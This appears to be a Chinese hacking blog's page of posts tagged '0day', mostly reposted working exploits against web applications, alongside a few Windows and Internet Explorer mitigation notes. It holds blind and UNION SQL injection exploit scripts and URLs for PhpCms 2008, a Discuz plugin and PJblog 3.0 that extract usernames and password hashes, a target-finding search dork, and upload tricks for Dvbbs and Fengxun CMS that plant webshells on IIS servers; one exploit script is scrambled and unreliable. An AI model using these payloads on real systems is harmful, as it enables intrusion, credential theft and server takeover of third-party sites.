我的时光,停在了你的角落…~
Posts tagged 0day
提权0day—Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
Jan 21st
Windows 7、Windows 2008、Windows Vista、Windows 2003、Windows XP、Windows 2000、Windows NT4下均可利用,guset权限下也能成功。可应用的地方很多,很好的一个洞。不知微软补丁时会不会顺带补上其他的~
[转载]IE新0day漏洞及临时缓解办法
Jan 18th
此0day漏洞存在于IE浏览器,且可导致远程代码执行
研究发现Windows 2000 SP4上(以下省去Windows)的IE 5.1 SP4不受此影响;而以下IE版本(无论是32位还是64位)均受此漏洞影响:
2000 SP4上的 IE6 SP1
XP、Server 2003、Vista、Server 2008、7、Server 2008 R2上的IE6、IE7、IE8
此漏洞存在于IE无效的指针引用。当对象被删除后,在一定的条件下可以访问无效的指针。在针对此漏洞的攻击里试图访问一个已释放的对象时,可引起IE执行远程代码。
当前,微软已知的利用此漏动的攻击影响有限且有针对性,仅针对IE6。微软并未发现利用此漏洞针对其他版本IE的攻击。微软会继续监视漏洞带来的影响并更新安全通报979352。
另外,已发现的利用此漏洞的攻击可以被DEP(Data Execution Prevention,数据执行保护)阻挠。DEP在IE8中是默认启用的;而在IE7中,用户可手动开启DEP。
手动开启IE7中DEP保护的办法:
1.打开“Internet属性”(从控制面板打开;或打开IE,选择“工具”,再选择“Internet属性”),切换到“高级”选项卡。
2.选中“启用内存保护帮助减少联机攻击”,重启IE7后生效。
或者你也可以使用微软提供的Fix It工具来针对IE6、IE7启用DEP保护
Fix It微软官方下载地址(单击):http://go.microsoft.com/?linkid=9668626
下载后,按照此工具的向导操作即可。
卸载工具下载地址(单击):http://go.microsoft.com/?linkid=9668627
资料来自: 中国自学网(Www.CnZiXue.Com) 详细出处参考:http://www.cnzixue.com/html/sort/virus/2010/0117/5329.html
动网8.x最新0day
Oct 8th
利用的还是IIS的文件名解析漏洞.
影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0
注册用户-我的主页-个人空间管理
userspace.asp?sid=0&act=modifyset
然后编辑CSS风格-文件管理
bbs/Dv_plus/myspace/script/filemange.asp
上传 hacknote.asp;hacknote.jpg
接下来知道了吧
赶快行动吧
from:http://www.abcxd.com/abcxd/abcxdArticle/ASPoday/DvbbsVersion8.html
phpcms2008 最新0day & Exp
Sep 20th
来源:My5t3ry
漏洞存在于yp/job.php的17-34行,urldecode函数惹的祸,代码如下:
PHP代码
switch($action)
{
case 'list':
$catid = intval($catid);
$head['keywords'] .= '职位列表';
$head['title'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$head['description'] .= '职位列表'.'_'.$PHPCMS['sitename'];
$templateid = 'job_list';
if($inputtime)
$time = time() - 3600*$inputtime*24;
else $time = 0;
if($time < 0 )$time = 0;
$where = "j.updatetime >= '{$time}' ";
$genre = urldecode($genre);
if($station)$where .= "AND j.station = '{$station}' ";
if($genre)$where .= "AND c.genre = '{$genre}' ";
if(!trim($where))$where = '1';
break;
exp:
PHP代码 if ($argc != 4) $hostname = $argv [1]; function usage () function request ($hostname, $path, $query) $request = "GET {$path}/job.php?action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n". fputs ($fp, $request); while (!feof ($fp)) fclose ($fp); function exploit ($hostname, $path, $uid, $fld, $chr, $pos) $chr = ord ($chr); $query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); preg_match ("/(.+)<\/span>/", $outcode, $x); if (strlen (trim ($x [1])) == 0) $query = "x%2527"; $outcode = request ($hostname, $path, $query); preg_match('/FROM `(.+)yp_job/ie',$outcode,$match); $prefix=$match[1]; //function lengthcolumns () if ($match[1]) { echo '[+]Good Job!Wo Got The pre -> '.$match[1]."\n"; else { echo "[~]trying to get username length...\n"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%2527", $query); $outcode = request ($hostname, $path, $query); $i++; preg_match ("/(.+)<\/span>/", $outcode, $x); if (strlen (trim ($x [1])) != 0) { $length=$i-1; // return $length; echo "\n[~]Trying to Crack..."; while ($pos <= $length) if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos)) $pos = 9; echo "\n[+]password(md5) -> "; while ($pos <= 24) echo "\n[+]Done!"; ?>
usage ();
$path = $argv [2];
$userid = $argv [3];
$prefix="phpcms_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
$pos = 1;
$chr = 0;
{
global $argv;
echo
"\n[+] PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit".
"\n[+] Author: My5t3ry".
"\n[+] Site : http://hi.baidu.com/netstart".
"\n[+] Usage : php ".$argv[0]."
"\n[+] Ex. : php ".$argv[0]." localhost /yp 1".
"\n\n";
exit ();
}
{
$fp = fsockopen ($hostname, 80);
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";
$reply .= fgets ($fp, 1024);
return $reply;
}
{
global $prefix;
return false;
else
return true;
}
//{
echo "\n--------------------------------------------------------------------------------\n";
echo " PhpCms 2008 (job.php \$genre) Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n--------------------------------------------------------------------------------\n";
echo "[~]trying to get pre...\n";
}
die(" Exploit failed...");
}
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
$query = "x' OR length((select username from ".$prefix."member Where userid='{$userid}'))=".$i." OR '1'='2";
//echo $outcode;
if ($i>20) {die(" Exploit failed...");}
$exit=1;
}else{
$exit=0;
}
}
echo "[+]length -> ".$length;
//}
echo "\n[+]username -> ";
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
{
$key = "abcdef0123456789";
if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
echo "\n\n--------------------------------------------------------------------------------";
Discuz账号发放插件注入0day
Aug 14th
来源: 普瑞斯特
Discuz账号发放插件注入0day
插件名:2Fly礼品(序号)发放系统
漏洞文件:2fly_gift.php
版本:最新版
Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
搜索引擎特征:inurl:2fly_gift.php
上图:
风讯 4.0 SP7 getshell 0day
Jul 12th
发现者:bloodsword、bink,转载请无视
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。
漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder&Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles/06150583700其中这个06150583700是你的userid,登录了直接可以看到,建立一个.asp目录
因为风讯浏览目录的地方也过滤了.,所以建立的子目录进不去。本地构造表单:
<form name="FileForm" method="post" enctype="multipart/form-data"action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp">2.<input type="hidden" name="AutoReName" value="2"><br>3.<input type="hidden" name="Path" value="/userfiles/06150583700/aaa.asp">4.<input type="file" size="20" name="File1">5.<input type="hidden" name="FilesNum" value="1">6.<input type="submit" id="BtnSubmit" name="Submit" value=" 确 定 ">7.<input type="reset" id="ResetForm" name="Submit3" value=" 重 填 ">8.</form>
<form name=”FileForm” method=”post” enctype=”multipart/form-data” action=”http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp”>
<input type=”hidden” name=”AutoReName” value=”2″><br>
<input type=”hidden” name=”Path” value=”/userfiles/06150583700/aaa.asp”>
<input type=”file” size=”20″ name=”File1″>
<input type=”hidden” name=”FilesNum” value=”1″>
<input type=”submit” id=”BtnSubmit” name=”Submit” value=” 确 定 “>
<input type=”reset” id=”ResetForm” name=”Submit3″ value=” 重 填 “>
</form>
传个夹带一句话的图片上去
恶心的地方来了,传上去的文件名是日期+时间+5位随机数(可能是4位3位2位1位,反正最大5位),这个我跟bink研究了半天,没有
办法看到-_-,用管中窥豹有个暴力猜接上传路径的功能,先在正常目录里上传个文件,卡一下本地跟远程的时间差,然后传到.asp
目录里,把秒数误差控制在3秒以内,开始跑吧~~然后自己该干嘛干嘛去,RP过关的话几个小时内应该能出结果-_-
From 0KEE
DirectShow 0DAY第二波警告!SOS!
Jul 5th
漏洞攻击形势:
DirectShow 0DAY第二波爆发!!该漏洞在国内已经呈大规模爆发形势。至少有几千网站被挂上了该漏洞的网页木马!
漏洞攻击细节:
与第一波的DirectShow 0DAY 不同,这次的漏洞是DirectShow相关msvidctl.dll组件解析畸形MPEG2视频格式文件触发溢出,攻击者可以使用普通的javascript堆喷射方式远程执行任意代码。
漏洞来源:http://news.baike.360.cn/3451604/27274290.html
漏洞临时解决方法:
——————-KillBit相关组件,将下面的内容保存为.reg文件双击即可.————————-
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400
针对最近的那个DirectShow 0day的临时安全设置
Jun 7th
作者:tombkeeper
以下主要是写给订阅这个blog的非信息安全专业人士看的,同行们可以忽略。
关于漏洞的相关信息在这里:
http://www.microsoft.com/china/technet/security/advisory/971778.mspx。
目前微软还没有修复该漏洞。运气好的话,也许微软会在本月就发布补丁,但更大的可能是至少到下个月中旬才会有补丁。
无论你是否使用了微软提供的临时解决方案,我都建议大家在IE中进行以下的额外安全设置:
即在“运行未用 Authenticode 签名的组件”和“运行已用 Authenticode 签名的组件”下选择“禁用”。
这个设置并不会修复漏洞,但是可以让目前针对这个漏洞的利用方法失败。我建议大家让自己的IE浏览器一直保持着这样的安全设置,即使在微软提供了该漏洞的补丁之后。
Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability
Apr 24th
此漏洞,暂无补丁,转载开始……
Microsoft Internet Infomation Server 6.0 ISAPI Filename Analytic Vulnerability
function Copyright()
{
var Author=”80sec”;
var Email=”kEvin#80sec.com”.replace(”#”,”@”)
var Site=”http://www.80sec.com”;
var Date=new Date(2009,4,24).toLocaleString();
var Reference=”http://www.80sec.com/Microsoft-Internet-Infomation-Server-6-ISAPI-filename-analytic-Vulnerabilitie.html”;
return Reference;
}
/*
漏洞描述:
IIS6 (Internet Infomation Server 6.0) 是微软出品的一款WEB服务器系统, 广泛用于各种个人/商业信息发布/网站架设领域。80sec在测试中发现, IIS设计上在处理畸形文件名的时候存在一个严重的安全漏洞, 可能绕过web程序的逻辑检查从而能导致服务器以IIS进程权限执行任意恶意用户定义的脚本, 黑客可以通过制造畸形的服务器文件来触发该 漏洞, 并从而控制服务器.
漏洞厂商:
Microsoft [ http:\/\/www.microsoft.com ]
漏洞测试:
Undefined
解决方案:
等待微软更新官方补丁.
*/
PJblog V3.0 0day Vbs版漏洞利用工具
Apr 23rd
漏洞具体细节请看http://0kee.com/read.php?tid-908.html,我的电脑上没有安装php,就编写了一个Vbs版漏洞利用工具,具体代码如下:
-
If WScript.Arguments.Count <> 2 Then
-
WScript.Echo “Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名”
-
WScript.Echo “Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam”
-
WScript.Quit
-
End If
-
-
attackUrl = WScript.Arguments(0)
-
attackUser = WScript.Arguments(1)
-
attackUrl = Replace(attackUrl,“\”,”/“)
-
If Right(attackUrl , 1) <> ”/“ Then
-
attackUrl = attackUrl & ”/“
-
End If
-
SHA1Charset = ”123456789ABCDEFJ“
-
strHoleUrl = attackUrl & ”ction.asp?action=checkAlias&cname=0kee“”“
-
-
If IsSuccess(strHoleUrl & ”r “”1“”=“”1“) And Not IsSuccess(strHoleUrl & ”and “”1“”=“”2“) Then
-
WScript.Echo ”恭喜!存在漏洞“
-
Else
-
WScript.Echo ”没有检测到漏洞“
-
WScript.Quit
-
End If
-
-
For n=1 To 40
-
For i=1 To 17
-
strInject = strHoleUrl & ” Or 0<(Select Count(*) From blog_member Where mem_name=‘” & attackUser & ”‘ And mem_password>=’” & strResult & Mid(SHA1Charset, i, 1) & ”‘) And ”"1″”=”"1″
-
If Not IsSuccess(strInject) Then
-
strResult = strResult & Mid(SHA1Charset, i-1, 1)
-
Exit For
-
End If
-
strPrint = chr(13) & “Password(SHA1): ” & strResult & Mid(SHA1Charset, i, 1)
-
WScript.StdOut.Write strPrint
-
Next
-
Next
-
WScript.Echo Chr(13) & Chr (10) & “Done!”
-
-
Function PostData(PostUrl)
-
Dim Http
-
Set Http = CreateObject(“msxml2.serverXMLHTTP”)
-
With Http
-
.Open “GET”,PostUrl,False
-
.Send ()
-
PostData = .ResponseBody
-
End With
-
Set Http = Nothing
-
PostData =bytes2BSTR(PostData)
-
End Function
-
-
-
Function bytes2BSTR(vIn)
-
Dim strReturn
-
Dim I, ThisCharCode, NextCharCode
-
strReturn = “”
-
For I = 1 To LenB(vIn)
-
ThisCharCode = AscB(MidB(vIn, I, 1))
-
If ThisCharCode < &H80 Then
-
strReturn = strReturn & Chr(ThisCharCode)
-
Else
-
NextCharCode = AscB(MidB(vIn, I + 1, 1))
-
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
-
I = I + 1
-
End If
-
Next
-
bytes2BSTR = strReturn
-
End Function
-
-
Function IsSuccess(PostUrl)
-
-
strData = PostData(PostUrl)
-
‘Wscript.Echo strData
-
if InStr(strData,“check_error”) >0 then
-
IsSuccess = True
-
Else
-
IsSuccess = False
-
End If
-
‘Wscript.Sleep 500 ’让系统休息一下
-
End Function
-
-
-
-
用法:Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名
from:http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html
PJblog V3.0 0day+EXP
Apr 23rd
影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行:
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行:
-
strcname=request(“cname”)
-
set checkcdb=conn.execute(“select * from blog_Content where log_cname=”“”&strcname&“”“”)
Exp:
-
<?php
-
/*
-
PJblog V3.0 0day exp
-
code by 小蟑螂&bink
-
www.0kee.com www.t00ls.net
-
09.04.22
-
*/
-
-
$url=“http://www.pjhome.net”; //注入地址
-
$var_name=“puterjam”; //管理员
-
$var_key=“check_right”;
-
-
if ($_SESSION["LenI"]){
-
$LenI=$_SESSION["LenI"];
-
}else{
-
$LenI=1;
-
}
-
for($i=$LenI;$i<=40;$i++){
-
if($_SESSION["LenDo"]){
-
$StaAsc=$_SESSION["LenDo"];
-
}else{
-
$StaAsc=31;
-
}
-
echo “Scan password len:”.$i.“ ;asc form ”.$StaAsc.“ to 127″;
-
for($j=$StaAsc;$j<=127;$j++){
-
$newurl=$url.‘/action.asp?action=checkAlias&cname=firebug_plugins_firediff”%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c’.$i.‘%2c1%29%29%20From%20blog_member%20where%20mem_name=\”.$var_name.‘\’%29%3e’.$j.‘%20and%20″1″=”1′;
-
$var_pagelen=file_get_contents($newurl);
-
$var_newpagelen=strpos($var_pagelen,$var_key);
-
if($var_newpagelen == true){
-
$_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
-
unset($_SESSION["LenDo"]);
-
$_SESSION["LenI"]=$i+1;
-
doReload();
-
break;
-
}
-
if($j == $StaAsc+10){
-
doReload();
-
break;
-
}
-
}
-
}
-
if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }
-
-
-
function doReload(){
-
?>
-
<script language=“javascript”>
-
<!–
-
window.setTimeout(‘location.reload()’,1000);
-
//–>
-
</script>
-
<?php
-
}
-
?>
-
此文发布时官方已经打了补丁
最新评论